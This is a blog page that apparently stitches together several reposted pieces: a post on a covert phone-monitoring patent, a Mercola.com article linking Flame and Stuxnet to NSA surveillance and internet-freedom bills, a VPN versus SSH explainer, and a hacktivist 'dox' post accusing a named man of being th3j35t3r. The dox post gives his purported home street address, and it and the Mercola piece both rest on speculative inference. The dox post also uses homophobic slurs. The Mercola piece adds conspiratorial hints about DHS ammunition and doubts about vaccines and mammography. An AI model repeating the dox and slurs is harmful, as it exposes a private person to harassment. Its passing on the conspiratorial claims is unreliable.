transmitters/points-of-presence used, SIM data, device settings, location, profiles, and other device information). Additionally, the capability to covertly utilize a mobile device as a covertly managed camera or microphone provides other unique challenges.

Thus covert monitoring of a mobile device’s operation poses the significant technical challenges of hiding or masking the installation and operation of the monitoring application, its command and control sessions, hiding the collected monitoring results until they are exfiltrated, surreptitiously transmitting the results, and managing the billing for the related wireless services. The exemplary illustrative technology herein addresses these and other important needs.

In short, Oceans’ Edge Inc., a company founded and operating in the heart of CIA country, says it has a technology that can secretly install itself on mobile phones and push all the contents of the devices to an external database, doing so entirely under the radar of both the target and the target’s mobile provider. It even boasts that the tool allows for covertly managing phone cameras and microphones.

What kind of contracts does this company have, and with which government agencies? A cursory internet search didn’t turn up much, except for a couple of bids to work on a military information operations program and a cyber defense project. Neither one of those programs has an obvious link to the mobile snooping device described in the patent application.

Since we don’t know which agencies are using this technology or how, it’s hard to say to what extent this kind of secret monitoring is taking place in the US. We have some evidence suggesting that the FBI and DEA are using this tool (thanks, Chris Soghoian, for the tip). If those agencies really are using this technology, they should get warrants before they compromise anyone’s phone.

Is the government getting warrants to use this tool? We don’t know.

Oceans’ Edge Inc., like many purveyors of surveillance products, claims that its technology is only deployed for “lawful interception,” but it makes no claims about what that actually means. There’s no mention of judicial oversight, warrants, or any kind of due process. As I’ve written elsewhere on this blog, given the state of the law concerning surveillance in the digital age, we shouldn’t let our guard down simply because a company claims its surveillance tools are used lawfully. That’s because we do not know how these tools are being deployed, and yet we know that the state of surveillance law in the US at present grants the government wide latitude to infringe on our privacy in ways that are often improper or even unconstitutional.

In most cases (with a few notable exceptions), lawmakers haven’t worked to address this issue.

As we can see, surveillance technologies are developing rapidly. It’s past time for our laws to catch up.

sosadmin’s blog

Pwn The Drones: Investigative Research into Drone Technology, Vulnerabilities, Exploits, Future

Aug 14, 2012 | Activism, Video

EFF activists Trevor Timm and Parker Higgins explain how widespread drones are becoming, how they’ve already been hacked, and how the situation may get a lot worse before it gets better.

Out of Control: Flame, Stuxnet, and the Cyber-Security Landscape

Aug 14, 2012 | Abuses of Power, Government Agenda

Big Brother is watching. No kidding. And the warning is coming from none other than Google, which says government spies may be spying on you. Some believe the Google announcement may be related to the recent discovery of the data-mining virus named “Flame.” In a June 3 New York Times article, Andrew Kramer and Nicole Perlroth write¹:

“When Eugene Kaspersky, the founder of Europe’s largest antivirus company, discovered the Flame virus that is afflicting computers in Iran and the Middle East, he recognized it as a technologically sophisticated virus that only a government could create.

He also recognized that the virus, which he compares to the Stuxnet virus built by programmers employed by the United States and Israel, adds weight to his warnings of the grave dangers posed by governments that manufacture and release viruses on the internet.

“Cyberweapons are the most dangerous innovation of this century,” he told a gathering of technology company executives… While the United States and Israel are using the weapons to slow the nuclear bomb-making abilities of Iran, they could also be used to disrupt power grids and financial systems or even wreak havoc with military defenses.”

Mr. Kaspersky claims he was called in to investigate the new virus on behalf of the International Telecommunication Union, an agency of the United Nations. The virus was allegedly erasing files on computers belonging to the Iranian oil ministry.

What makes the Flame virus a major potential concern for common citizens of the world is the fact that it’s the first virus found with the ability to spread wirelessly by attaching itself to Bluetooth-enabled devices.

Once there, it can not only trace and steal information stored on those devices; according to Kramer and Perlroth the program also contains a “microbe” command that can activate any microphone within the device, record whatever is going on at the time—presumably whether you’re actually using the device or not—and transmit audio files back to the attacker. This, clearly, has huge privacy implications were it to be deployed against civilian populations.

New Revelations about the Links Between Flame and Stuxnet

While cybersecurity experts initially claimed there were no links between the earlier Stuxnet worm and the Flame virus, a recent article on The Verge now reports that the two are undoubtedly related². Joshua Kopstein writes:

“[I]n examining an earlier version of Stuxnet, the lab’s researchers now find that they were wrong: a previously overlooked module within the virus is now providing the “missing link” between the two pieces of malware. The module in question… matches very closely with a module used by an early version Flame. “It was actually so similar, that it made our automatic system classify it as Stuxnet,” wrote Alexander Gostev… indicating that the module was likely the seed of both viruses. “We think it’s actually possible to talk about a ‘Flame’ platform, and that this particular module was created based on its source code.”

The new evidence suggests that Stuxnet and Flame are two sides of the same coin, with the former built for sabotage and the latter for surveillance. But researchers also say that the Flame platform pre-dated Stuxnet and its sister, Duqu, and was likely built in the Summer of 2008.”

InformationWeek Security recently offered the following advice³:“… Microsoft has been working quickly to patch the certificate bug exploited by Flame. Notably, Microsoft released an update Friday [June 8] for Windows Server Update Services (WSUS) 3.0 Service Pack 2 (SP2), which according to the release notes “strengthens the WSUS communication channels … [by] trusting only files that are issued by the Microsoft Update certification authority.”

Microsoft is also set to issue an update Tuesday–as part of its monthly Patch Tuesday–that will further update all supported versions of Windows to block Flame. Security experts are recommending that all users install the update as soon as possible, since attackers will likely attempt to use the certificate vulnerability before it becomes widely patched. “Apply the certificate patch released a week ago today if you haven’t done so already,” said SANS Institute chief research officer Johannes B. Ullrich in a blog post. “This way, no patch signed by the bad certificate should be accepted tomorrow. Patch Tuesday is one of the best dates to launch such an attack, as you do expect patches anyway.”

When installing the update, however, do so preferably only if using a trusted environment. “Avoid patches while ‘on the road.’ Apply them in your home [or] work network whenever possible,” said Ullrich. “This doesn’t eliminate the chance of a ‘man in the middle’ (MitM) attack, but it reduces the likelihood.”

For users who must update while on the road, perhaps because they travel frequently, always use a VPN connection back to the corporate network, said Ullrich, since hotel networks can be malware and attack hotbeds. “Hotel networks and public hotspots frequently use badly configured HTTP proxies that can be compromised and many users expect bad SSL certificates–because of ongoing MitM attacks,” he said.”

Spy Central: Utah

In related news, Wired Magazine recently reported that the US government is building a massive spy center, right in the heart of Mormon country, in Bluffdale, Utah⁴–so massive, in fact, that once finished, the facility will be five times larger than the US Capitol.

According to Wired Magazine:

“Under construction by contractors with top-secret clearances, the blandly named Utah Data Center is being built for the National Security Agency. A project of immense secrecy, it is the final piece in a complex puzzle assembled over the past decade. Its purpose: to intercept, decipher, analyze, and store vast swaths of the world’s communications as they zap down from satellites and zip through the underground and undersea cables of international, foreign, and domestic networks. The heavily fortified $2 billion center should be up and running in September 2013.

Flowing through its servers and routers and stored in near-bottomless databases will be all forms of communication, including the complete contents of private emails, cell phone calls, and Google searches, as well as all sorts of personal data trails—parking receipts, travel itineraries, bookstore purchases, and other digital “pocket litter.” It is, in some measure, the realization of the “total information awareness” program created during the first term of the Bush administration—an effort that was killed by Congress in 2003 after it caused an outcry over its potential for invading Americans’ privacy.

But “this is more than just a data center,” says one senior intelligence official who until recently was involved with the program. The mammoth Bluffdale center will have another important and far more secret role that until now has gone unrevealed. It is also critical, he says, for breaking codes.

And code-breaking is crucial, because much of the data that the center will handle—financial information, stock transactions, business deals, foreign military and diplomatic secrets, legal documents, confidential personal communications—will be heavily encrypted. According to another top official also involved with the program, the NSA made an enormous breakthrough several years ago in its ability to cryptanalyze, or break, unfathomably complex encryption systems employed by not only governments around the world but also many average computer users in the US.

The upshot, according to this official: “Everybody’s a target; everybody with communication is a target.”[Emphasis mine]

That about says it all. And for those of you still under the mistaken belief that the US government does not have the authority to spy on its citizens, consider the following:

“… [The NSA] has undergone the largest building boom in its history, including installing secret electronic monitoring rooms in major US telecom facilities. Controlled by the NSA, these highly secured spaces are where the agency taps into the US communications networks, a practice that came to light during the Bush years but was never acknowledged by the agency. The broad outlines of the so-called warrantless-wiretapping program have long been exposed…

In the wake of the program’s exposure, Congress passed the FISA Amendments Act of 2008, which largely made the practices legal. Telecoms that had agreed to participate in the illegal activity were granted immunity from prosecution and lawsuits. What wasn’t revealed until now, however, was the enormity of this ongoing domestic spying program.

For the first time, a former NSA official has gone on the record to describe the program, codenamed Stellar Wind, in detail…

As chief and one of the two cofounders of the agency’s Signals Intelligence Automation Research Center, [William] Binney and his team designed much of the infrastructure that’s still likely used to intercept international and foreign communications. He explains that the agency could have installed its tapping gear at the nation’s cable landing stations—the more than two dozen sites on the periphery of the US where fiber-optic cables come ashore.

If it had taken that route, the NSA would have been able to limit its eavesdropping to just international communications, which at the time was all that was allowed under US law.

Instead it chose to put the wiretapping rooms at key junction points throughout the country… thus gaining access to not just international communications but also to most of the domestic traffic flowing through the US. The network of intercept stations goes far beyond the single room in an AT&T building in San Francisco exposed by a whistle-blower in 2006. “I think there’s 10 to 20 of them,” Binney says… The eavesdropping on Americans doesn’t stop at the telecom switches. To capture satellite communications in and out of the US, the agency also monitors AT&T’s powerful earth stations…

… Binney suggested a system for monitoring people’s communications according to how closely they are connected to an initial target. The further away from the target—say you’re just an acquaintance of a friend of the target—the less the surveillance. But the agency rejected the idea, and, given the massive new storage facility in Utah, Binney suspects that it now simply collects everything…”

To learn more, I highly recommend reading the featured Wired article⁵ in its entirety. It’s a fascinating read, but it will not likely make you sleep better at night. The full article is available on their website and is free to view.

Google Also in the Privacy News

Beginning the first week of June, Google will warn you every time it picks up activity on your computer account that looks suspiciously like someone trying to monitor your computer activities. Google won’t say how it figured out that state-sponsored attackers may be attempting to compromise your account or computer. But it’s promised to let you know if it thinks Big Brother is tuned in to what you’re doing.

As recently reported on the New York Times’ blog⁶, the warning will pop up at the top of your Gmail inbox, Google home page, or Chrome browser, stating:

“Warning: We believe state-sponsored attackers may be attempting to compromise your account or computer.”

According to a Google blog post by Eric Grosse, VP of Security Engineering at Google⁷:

“If you see this warning it does not necessarily mean that your account has been hijacked. It just means that we believe you may be a target, of phishing or malware for example, and that you should take immediate steps to secure your account.

Here are some things you should do immediately: create a unique password that has a good mix of capital and lowercase letters, as well punctuation marks and numbers; enable 2-step verification as additional security; and update your browser, operating system, plugins, and document editors.

Attackers often send links to fake sign-in pages to try to steal your password, so be careful about where you sign in to Google and look for https://accounts.google.com/ in your browser bar. These warnings are not being shown because Google’s internal systems have been compromised or because of a particular attack.”

The Next Big War Zone = the Internet

Unless you’ve been living under a rock this past year, you’ve surely heard about the repeated attempts to restrict your online freedom and grant government near limitless control over the internet and its content.

It began in January with the introduction of two proposed laws in US Congress: the Stop Online Piracy Act (SOPA), and the Protect IP Act (PIPA). While “sold” as laws to address online copyright infringement, most of which allegedly arise from outside the US, both laws contained measures capable of severely restricting online freedom of speech and harm web sites and online communities of all kinds, including this one. After tens of millions of people rose up in various protests, both online and by hitting the pavement, both bills were “indefinitely postponed.”

Many have warned, however, that the bills are not “dead” and are likely to return.

It didn’t take long for the next round. In April, the Cyber Intelligence Sharing and Protection Act (CISPA) was brought forth, and quickly became described by opponents as an even greater threat to internet freedom than SOPA and PIPA. I won’t go into any detailed discussion on these bills here, but simply want to bring your attention to the fact that bills such as these three, while dressed up as laws that will protect you and save you money, are poorly guised attempts to gut privacy laws and open the door for a totalitarian takeover of the internet and its content.

Campaign for Liberty⁸ is continuing its fight to stop another government intrusion, warning that this coming December, the United Nations will also be meeting to compile even more recommendations for international internet regulations.

While it may seem hopeless at times, I urge you to take an active role anytime the opportunity presents itself to take a stand. I personally believe internet freedom and health freedom go hand in hand these days, as a majority of people get a majority of their health information from freely available web sites such as mine.

Right now, you can sign the Campaign for Liberty Protect Internet Freedom Mandate.

If Squelching In formation Freedom Doesn ‘t Work, What’s Next?

The draconian advancements in surveillance do not end with the erection of a massive spy central and ever-increasing attacks on internet freedom. We also have some 63 drone launch sites within the US⁹, and the US military has admitted it now has drone technology in the form of tiny mechanical insects, equipped with cameras, microphones, and DNA sampling capabilities¹⁰.

Besides that, there’s an ever-expanding arsenal of so-called “active denial weapons”—directed energy weapons that can scatter or incapacitate those in its path, by a variety of means¹¹. Such weapons are already being used domestically by various law enforcement agencies for crowd control. Then there are more sinister signs of readiness for domestic combat. In April, news reports began circulating questioning the Department of Homeland Security’s rationale for purchasing 450 million rounds of hollow point bullets¹²

A report by RT News reads:

“The department has yet to discuss why they are ordering such a massive bevy of bullets for an agency that has limited need domestically for doing harm, but they say they expect to continue receiving shipments from the manufacturer for the next five years, during which they plan to blow through enough ammunition to execute more people than there are in the entire United States.

… the choice — and quantity — of its hollow point order raises a lot of questions about future plans for the DHS… On their website, the contractor claims that the ammunition is specifically designed so that it can pass through a variety of obstructions and offers “optimum penetration for terminal performance.” Or, in other words, this is the kind of bullet designed to stop any object dead in its tracks and, if emptied into the hands of the DHS a few hundred million times, just might do as much.

… As the DHS gains more and more ground in fighting terrorism domestically, the US at the same time has turned the tables to make its definition of terrorist way less narrow. With any American blogger or free thinking on the fringe of what the government can go after under H.R. 347, or the National Defense Authorization Act that allows for the indefinite detention of US citizens without charge, the DHS could just be blasting through what’s left of its budget to make sure that its roster of agents across the country can get in their target practice over the next few years.”

Without Online Freedom, You Cannot Exercise Health Freedom

Some of you may at this point wonder why I report on an issue such as this, so let me make this point clear. Access to health information could easily be deemed a “threat” to national welfare—especially when web sites such as this one publish information that contradicts the official government stance. Examples such as advising women against national mammography screening standards, or raising concerns about vaccine safety, or questioning conventional cancer treatments could all be considered a threat to an extremely profitable status quo.

In such a scenario, they could simply shut Mercola.com, and others like us, down; leaving you with no truth-telling, corruption-exposing, alternative voices other than the officially sponsored viewpoint. And it should be quite clear by now that the government-sanctioned stance on most issues relating to health and diet are primarily dictated by powerful lobbying groups furthering financially-driven industry agendas that have absolutely nothing to do with optimizing health and longevity.

Don’t Be Fooled—Internet Security Bills are Likely Nothing of the Sort

Interestingly enough, CISPA is promoted primarily as a cyber security bill, which brings us full circle back to where this article started. Recall, the Flame virus has surveillance capabilities that far surpass previous viruses and worms that may collect or destroy data. In fact, its capability to transfer to Bluetooth-enabled gadgets and secretly activate microphones renders it perfect for spying on anyone and everyone, anywhere, at any time… which is exactly the plan, if you believe the information detailed in the featured Wired Magazine article above.

It’s interesting to note the rationale used when trying sell us this bill. According to an April 26 report in the International Business Times¹³:

“Co-sponsor Rep. Dutch Ruppersberger, D-Md., says CISPA provides essential tools for repelling online security threats: “Without important, immediate changes to American cyber security policy, I believe our country will continue to be at risk for a catastrophic attack on our nation’s vital networks, networks that power our homes, provide our clean water or maintain the other critical services we use every day.”

Sounds like he was talking about an eventuality just like the Flame virus, or the older Stuxnet worm, for that matter—both of which, incidentally, appear to have targeted Iranian oil- and nuclear facilities, and neither of which has been officially traced back to any country or agency, despite our already overwhelming security apparatus—just over a month before Flame was discovered by a Russian antivirus company which, by the way, currently employs the virus hunter who discovered Stuxnet in 2010.

I’ll leave the meaning of such coincidences for you to ponder. But suffice it to say, it does not bode well if a law like CISPA is enacted that allows companies and governments to share information collected online, especially when combined with a massive data-mining virus that can skip around from one wireless piece of technology to another, from computers to cell phones to iPads, gathering data on every single social network contact every single person has, and audio files on every single conversation any one might have at any point in time. Especially now that we will shortly have the facility to store and “process” all that data.

In closing, I will simply urge you to take efforts at curbing online freedom and extending the government’s reach seriously, and whenever such efforts are launched, take action to help preserve your right to health freedom, which is closely tied to the right to online freedom of speech.

For right now, you can take a stand by signing the Campaign for Liberty Protect Internet Freedom Mandate.

SOURCE: Mercola.com

VPN vs. SSH Tunnel: Which Is More Secure?

Jul 11, 2012 | Anonymous

VPNs and SSH tunnels can both securely “tunnel” network traffic over an encrypted connection. They’re similar in some ways, but different in others – if you’re trying to decide which to use, it helps to understand how each works.

An SSH tunnel is often referred to as a “poor man’s VPN” because it can provide some of the same features as a VPN without the more complicated server setup process – however, it has some limitations.

How a VPN Works

VPN stands for “virtual private network,” – as its name indicates, it’s used for connecting to private networks over public networks, such as the Internet. In a common VPN use case, a business may have a private network with file shares, networked printers, and other important things on it. Some of the business’s employees may travel and frequently need to access these resources from the road. However, the business doesn’t want to expose their important resources to the public Internet. Instead, the business can set up a VPN server and employees on the road can connect to the company’s VPN. Once an employee is connected, their computer appears to be part of the business’s private network – they can access file shares and other network resources as if they were actually on the physical network.

The VPN client communicates over the public Internet and sends the computer’s network traffic through the encrypted connection to the VPN server. The encryption provides a secure connection, which means the business’s competitors can’t snoop on the connection and see sensitive business information. Depending on the VPN, all the computer’s network traffic may be sent over the VPN – or only some of it may (generally, however, all network traffic goes through the VPN). If all web browsing traffic is sent over the VPN, people between the VPN client and server can’t snoop on the web browsing traffic. This provides protection when using public Wi-Fi networks and allows users to access geographically-restricted services – for example, the employee could bypass Internet censorship if they’re working from a country that censors the web. To the websites the employee accesses through the VPN, the web browsing traffic would appear to be coming from the VPN server.

Crucially, a VPN works more at the operating system level than the application level. In other words, when you’ve set up a VPN connection, your operating system can route all network traffic through it from all applications (although this can vary from VPN to VPN, depending on how the VPN is configured). You don’t have to configure each individual application.

To get started with your own VPN, see our guides to using OpenVPN on a Tomato router, installing OpenVPN on a DD-WRT router, or setting up a VPN on Debian Linux.

How an SSH Tunnel Works

SSH, which stands for “secure shell,” isn’t designed solely for forwarding network traffic. Generally, SSH is used to securely acquire and use a remote terminal session – but SSH has other uses. SSH also uses strong encryption, and you can set your SSH client to act as a SOCKS proxy. Once you have, you can configure applications on your computer – such as your web browser – to use the SOCKS proxy. The traffic enters the SOCKS proxy running on your local system and the SSH client forwards it through the SSH connection – this is known as SSH tunneling. This works similarly to browsing the web over a VPN – from the web server’s perspective, your traffic appears to be coming from the SSH server. The traffic between your computer and the SSH server is encrypted, so you can browse over an encrypted connection as you could with a VPN.

However, an SSH tunnel doesn’t offer all the benefits of a VPN. Unlike with a VPN, you must configure each application to use the SSH tunnel’s proxy. With a VPN, you’re assured that all traffic will be sent through the VPN – but you don’t have this assurance with an SSH tunnel. With a VPN, your operating system will behave as though you’re on the remote network – which means connecting to Windows networked file shares would be easy. It’s considerably more difficult with an SSH tunnel.

For more information about SSH tunnels, see this guide to creating an SSH tunnel on Windows with PuTTY. To create an SSH tunnel on Linux, see our list of cool things you can do with an SSH server.

Which Is More Secure?

If you’re worried about which is more secure for business use, the answer is clearly a VPN — you can force all network traffic on the system through it. However, if you just want an encrypted connection to browse the web with from public Wi-Fi networks in coffee shops and airports, a VPN and SSH server both have strong encryption that will serve you well.

There are other considerations, too. Novice users can easily connect to a VPN, but setting up a VPN server is a more complex process. SSH tunnels are more daunting to novice users, but setting up an SSH server is simpler – in fact, many people will already have an SSH server that they access remotely. If you already have access to an SSH server, it’s much easier to use it as an SSH tunnel than it is to set up a VPN server. For this reason, SSH tunnels have been dubbed a “poor man’s VPN.”

Businesses looking for more robust networking will want to invest in a VPN. On the other hand, if you’re a geek with access to an SSH server, an SSH tunnel is an easy way to encrypt and tunnel network traffic – and the encryption is just as good as a VPN’s encryption.

SOURCE: HowToGeek.com

#InfoSec: If it walks like th3j35t3r and talks like th3j35t3r, its probably TomRyanBlog

Jun 7, 2012 | Anonymous

UPDATE: Our hero Jake Davis provided some interesting commentary on this subject recently:

I remember seeing IRC logs of you and LulzSec dissing The Jester and saying his tool “XerXeS” is just SlowLoris with Tor… but how did you guys come to this conclusion? How can this be mitigated if his attacks appear to come from so many exit nodes? Just block all Tor exit nodes? I dnt wanna to. :(

“I have no idea how XerXeS or any other DDoS tool actually works, all I know is that the person or people running the character known as The Jester have been doing it successfully for many years with absolutely zero discrepancies, arrests or suspensions. I think that’s it’s incredibly impressive that The Jester has stuck to the courage of his/her/their convictions for such a large period of time, even though I disagree with some of the political views expressed. I’m a big fan of facilitating alternative realities and The Jester brings us into another world with many sophisticated layers that often make us forget that it’s just a twitter account and a blog, which is a talent few people have. I find the construction of the persona at a granular level far more admirable than the hacking itself, which I obviously don’t approve of. ” -via http://ask.fm/DoubleJake

>DecryptedMatrix gives voice to PiraX

Hello there, th3j35t3r. We would also like to welcome our fellow Anons, bloggers, and those simply interested in a cyber-culture controversy spanning over two years. We are sure you know why we have called you here. Your recent online behavior has been rather strange, to say the least. We are here for one reason: We want to end you.

We would like to start first by making you comfortable. No more quasi-anonymous pseudonym mumbo-jumbo. Your name is Thomas so we will call you by the name you were given by your mother. We know your name because it was confirmed over a month ago with the following Pastebin paste: http://pastebin.com/A5iiTAJS (PiraX Dox continued after paste)
________________________________________________________________________

Q: Are Thomas Ryan and th3j35t3r one and the same person?

tl;dr: Yes. You fucking bet they are. In the words of Oscar Wilde, however, ‘The truth is rarely pure and never simple.’ Thus, if you want the full, uncensored dox on th3j35t3r, you’re going to have to bear with me for the next ten minutes as I tear apart his tissue of lies and disinformation.

Now concentrate, cos here comes the proof…

Warning: Long dox is looooooooong. I trust it will prove to be an enlightening read however, not least for Mr Thomas Ryan of 86 Amber Street, Staten Island NY.

SEE TOM RYAN AS JESTER at DEFCON 19

Filmed at Defcon after observing Tom Ryan post and photograph a note outside the vendor room signed “J.” This photo was tweeted from @th3j35t3r twitter within moments, as was the following: https://i.imgur.com/axth3.jpg
Note the “Black cell paintball” logo on the shirt. BCP is the name of Tom’s Paintball team. Tom hangs on PBnation.com with a kid called j35t3r, which is the likely source for the name, and the first of many plagiarisms. NOT SUSPICIOUS AT ALL, folks. Nor is it suspicious that the ridiculous attempts to smear me as a secret blackhat/anon/whatever over the last year all come from the same group of six people connected to Tom. The other partner is tentatively identified, but that’s a story for later.

**********

Among the 9,000 names to have been linked with @th3j35t3r, one that keeps cropping up is that of @TomRyanBlog. The dox has been denied by th3j35t3r, but then Sabu repeatedly denied that he was Hector Monsegur, and we all know how that one ended up…

While many Anons have been focused on reverse DNS lookups, port scanning and conventional doxing methods to unmask Jester, no one seems to have tried a simpler technique: writing analysis.

If Tom Ryan (TR) and Jester (J) are one and the same person, it should be easy to tell. They’ve written 3,000 tweets between them. Even the l33t3st of the l33t would struggle to convincingly maintain two separate writing styles over the course of thousands of tweets and numerous blog posts.

For those who are new to the party, here’s an overview of what we know about TR and J:

Both are conservative, right-wing and love their precious military. Both hate #OWS, Wikileaks, Manning and are obsessed with unmasking Anons. Both are fixated with Sabu (still!), Team Pois0n and Cabin Cr3w. Both enjoy love-ins with @AsherahResearch, @AnonymousDown and all the usual trolls. In short, they’re both neo-con faggots. But are they one and the same faggot, or are they separate fags who happen to be pursuing identical vendettas?

Before we get bogged down in analyzing their writing styles, here’s some lighter tit-bits to get things kick-started:

1. Last year, TR and J both attended Hacker Halted in Miami and DEFCON in Nevada. Based on what we know of the pair’s political leanings and infosec knowledge, that alone automatically narrows them down to less than 5,000 possible suspects.

2. TR and J both like sushi (a trifling detail, but one that helps build a picture of their personalities). TR: “@p0isAn0N not going to the right Pizzaria. If you are in Boston you should be going to BoLoCo for Burritos anyway. And Duozo for Sushi.”
J: “#hackerhalted delegates … Stay clear of Cafe Bastille. Great sushi at Bali Cafe though… Stayin frosty.”

3. Tom Ryan has form for assuming false identities – such as ‘Robin Sage’. See here for the full story:
http://www.darkreading.com/insider-threat/167801100/security/privacy/225702468/index.html

INTERESTING FACT: @RobinSage joined Twitter on 26th December 2009 – exactly one week after @th3j35t3r joined.

The connection between Tom Ryan, Robin Sage and Jester was first brought to my attention by this tweet from @LulzKitten on 29th March 2012:

“Okay, let’s cut the crap, hello @Th3J35t3r aka@TomRyanBlog aka robinsage. Game over. Was fun, at least sometimes. Next nemesis, plox!”
(Note: Direct links to all tweets quoted in this dox can be found cited in the conclusion.) After reading LulzKitten’s tweet, I cast a casual glance over the Twitter feeds of Tom Ryan and Jester, and instantly noticed some similarities between the pair.

The most damning evidence linking TR and J – the smoking gun – will be presented towards the end of this dox, if you can wait that long, but first, let’s perform some writing analysis. After all, if TR and J are the same person, there ought to be some similarities in their writing styles, surely? You betcha. Here we go then:

Anyone who’s followed J on Twitter and read his blog may have noticed that he has a very distinctive writing style. Let’s pick through some of Jester’s trademark phrases, and then see if we can spot them recurring in TR’s tweets:

4. ‘Hmmmm’. Jester likes to say ‘Hmmm’ ‘Errr’ and ‘Ahemmm’ a lot. In fact he likes to say them so much that he even uses these filler phrases in his blog titles, as well as littering his tweets with them. Here’s some examples:

5th April: “@deftpunkz – umm holy shit. I dont know what to say guys, errrr thanks, i think? -”

4th April: “Al-Qaida ‘blacked out’ on the internet (effectively switched off) >>>http://timesofindia.indiatimes.com/tech/news/internet/Al-Qaida-blacked-out-on-internet/articleshow/12529550.cms #infosec#saladin #ahemm”

3rd April: “Now…… imagine…… how many of those listed in my last, were ummmmmm – on the ‘shit list’ – just a thought??? #anonymous”

27th Feb: “#Wikileaks & #anonymous dump 5 million#strafor internal emails obtained by #anonymouslast Dec..umm this right here…”

21st March: “Anti-Anonymous hacker threatens to expose them (via MSNBC) http://www.msnbc.com/id/46716942<<< ummm too late. #military #cyber #security#infosec #DoD”

15th Nov, WordPress blog title: “Occupy Wall Street?? 99%?? Ummm.”

Hmmm, I wonder if Tom Ryan also likes to say ‘Hmmm’? Let’s take a look:

10th April: “How To Prevent Data Leaks From Happening To Your Organization http://zite.to/HCucc8hmmm…how do you prevent the carbon factor from leaking?”

6th April: “Hmmm So @AnonW0rmer is arrested at 10:30http://j.mp/HiAASP tweets till 3:32, @ItsKahunadisappears @AnonymousIRC disappears for 4 Day >>>”

15th March: “CSI tonight has a scent of Anonymous. Anthropology professor teaching about Hactivism. Hmmm who came it be?”

11th March: “@kennethlipp hhhmmmm do you think any anons donated money to his reelection campaign?”

7th March: “@CryptKper @v0ld4m0rt you are spot on! Who could that have been? Hmmmmm”

16th Feb: “@agentdarkapple Interesting! Hmmm! I can see why you think I would be L and you would be N. L doesn’t smile like me”

OK, that’s enough Hmming – on to point #5: ‘Tick tock’. Jester loves to say ‘Tick tock’ – it’s one of his favorite phrases. Look:

6th March: “From 3.5 months ago:https://th3j35t3r.wordpress.com/2011/11/19/if-i-am-wrong-ill-say-im-wrong-heres-my-apology/…… from 1 hour ago ….http://www.foxnews.com/scitech/2012/03/06/hacking-group-lulzsec-swept-up-by-law-enforcement/ tick tock toldya.”

3rd August: “’RT @anonymousabu: @hjjrc @SparkyBlaze Your problem is with a ghost. Someone you can neither find nor stop.’ << you have same problem. #tick”

27th July: “@anonymousabu tick tock.”

24th July: “TICK TOCK. #toldyac2dc37a7d9d3238877a127f2d5171c9d”

21st June: “Tickety Tock…..”

25th June blog entitled LulzSec’s Cloudflare Configuration: “Tickety Tock Tock.”

Why, isn’t that a quirky little phrase? I wonder if Captain Hook – sorry, Tom Ryan – also uses the same terminology. Oh, what’s this we have here from 27th Feb?

“#Anonymous I am working on my big release. Hmmmm who should it goto? Tick Tock”

There’s even a ‘Hmmmm’ thrown in for good measure. How Jester-esque!

With a nudge and a wink, we move onto #6: Jester loves nothing more than to sign off his tweets with a sly wink. Just like so:

28th March: “@wwpinc – just in case you were not aware: >>>https://th3j35t3r.wordpress.com/support/ <<< – keep up the great work ;-) Peace. #pgr #wwp#woundedwarrior”

26th March: “Al-Qaida forums crippled in suspected cyber intervention http://j.mp/GSd8ih << bad things happen to bad people, apparently ;-) #infosec”

11th March: “@RepDanGordon @FBIPressOffice I merely stated u were on the list, u seem awful jittery. U need to calm down >> ;-)”

2nd Oct: “RT: @mach2600 @th3j35t3r It’s wobbling … up, down, up, down… <<< gotta love NGINX – always somethin huh ;-)”

16th June: “standby for supporting clarification onhttp://th3j35t3r.wordpress.com/2011/06/16/quick-n-dirty-just-for-clarification/?utm_source=Jesters+Court+Blog&utm_medium=twitter – close ya eyes if ya already saw it yesterday. ;-)”

2nd June: “http://www.foxnews.com/scitech/2011/06/02/pentagon-has-secret-list-cyber-weapons/ – #justsayin;-) #oorah”

Now it’s TR’s turn to have a sly wink:

5th April: “The beauty of data-mining in a social world, I don’t need to be connected to you, so you can’t block me. You just need to be on my radar ;-)”

5th April: “@x_ryujin_x @render64 @bitchiest @kalyptonetthink of what full dox did for Sabu ;-)”

4th April: “@LauraWalkerKC @BobbyCarbon@NavySEALsORG @Packetknife @HonorThemYou should record it ;-)”

14th March: “To Geeks & Nerds 3/14 is known as Pi Dayhttp://www.youtube.com/watch?v=JTZtuMdkUksTo Horny Men it’s known as Steak & Blow Job Day! The GF reminded me ;-)”

13th March: “@JackalAnon warned #Anonymous 2 Days Ago about OAuth and Apps. We’ve warned you about TOR. ;-)”

14th Feb: “Why I’m Glad My Boyfriend Isn’t On Facebook – Forbes http://j.mp/z9XNrP by @kashhill | Leaving Facebook made me never want to go back ;-)”

Next up, it’s similarity #7 – ‘Stay Frosty’. This, Jester’s catchiest of catch-phrases, crops up all over his tweets:

2nd April: “http://www.cbsnews.com/2100-202_162-20075647.html <<< still going on about this? Stay frosty and have a Cupcake??”

10th Nov: “#stayfrosty -Word of advice 2 @barrettbrownlol: Just because you’re paranoid doesn’t mean they aren’t out to get you. >”

26th Oct: “#hackerhalted left a little something under the projector in Alhambra SCADA room. Tweet me a photo of what’s there. #stayfrosty”

25th Oct: “#hackerhalted delegates … Stay clear of Cafe Bastille. Great sushi at Bali Cafe though… Stayin frosty.”

Now let’s see what Monsieur Ryan has to say for himself:

10th April: “Iran plans to unplug the Internet, launch its own “clean” alternative http://zite.to/Iqm1Ba#anonymous @CabinCr3w Stay Frosty ;-)”

16th March: “@testeux1 Class on Strategy? I can teach one at The Spy Museum in DC @wikileaks @revmagdalen@AnonymousIRC @YourAnonNews Stay Frosty ;-)”

13th March: “#Anonymous in your time of fear those of you that have used delete.twitlan / tweeteraser / twitwipe A Special Thank You!!! Stay Frosty! ;-)”

13th March: “@jackie_singh @krypt3ia I was promoted today to Brigadier General Packet of The Cyber Brigade@th3j35t3r now reports to me! Stay Frosty ;-)”

12th March: “Finch + Reese = ;-) …. Stay Frosty & Watch Your 6!”

Hang on a sec, isn’t it a bit, well, *obvious* for Tom Ryan to be liberally dropping Jester’s favorite catchphrase into his tweets? Yep, you’re right – it’s very obvious. But here’s the thing: the AntiSec dox that named Jester as Tom Ryan landed in Pastebin on 11th March. Notice how TR deliberately goes out of his way to play up to the ‘Stay Frosty’ caricature in the ensuing days? That’s because he realizes that the more he pretends to be Jester, the more people will be inclined to write him off as just another Jester wannabe. For another example of this tactic, here’s how J tweets every time he downs a Muslim extremist website:

1st March: “http://www.rjfront.info – TANGO DOWN. Temporarily. For enabling recruitment, & co-ordination of jihadist terror cells via web.”

1st March: “http://www.atahadi.com – TANGO DOWN. Temporarily. For online incitement to cause young muslims to carry out acts of violent jihad.”

Exactly one month later, on 1st April, TR tweets the following:

